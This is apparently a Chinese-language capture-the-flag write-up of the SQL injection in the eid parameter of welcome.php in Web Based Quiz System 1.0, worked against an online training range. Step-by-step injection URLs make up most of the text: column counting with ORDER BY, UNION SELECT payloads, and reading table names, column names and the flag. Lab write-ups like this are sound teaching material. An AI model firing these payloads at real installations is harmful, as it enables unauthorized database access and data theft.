Web Based Quiz System SQL注入
靶场介绍
在Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。 受影响的是未知功能文件:welcome.php。 手动调试的软件参数:eid不合法输入可导致 SQL注入 (漏洞地址在下面写出)
影响版本
Web Based Quiz System 1.0
漏洞检测
复制路径在搜索引擎上进行访问,访问后页面
进行注册
登录后页面
点击序列3 start
测试sql注入漏洞
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27&n=1&t=10 |
在eid后添加 ’ 用于测试sql漏洞 %27在url编码中是 ‘ 然后在%27后加–+
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20--+&n=1&t=10 |
进行查字段数
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20%20order%20by%201--+&n=1&t=10 |
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0' order by 6--+&n=1&t=10 |
进行了报错 看来他的字段有5个
查询回显点
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,3,4,5%20--+&n=1&t=10 |
回显点是3
查询数据库名
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,database(),4,5%20--+&n=1&t=10 |
查询表名
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+&n=1&t=10 |
查询字段名
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,group_concat(column_name),4,5%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27%20--+&n=1&t=10 |
查询字段数据
1 | http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,flag,4,5%20from%20flag--+&n=1&t=10 |
成功获得flag然后提交flag即可
靶场地址
1 | https://yunjing.ichunqiu.com/ranking/summary?id=AzBXbl1oAmQ |
注册送5沙硕 利用沙硕可挑战内网靶场 快来薅羊毛
评论
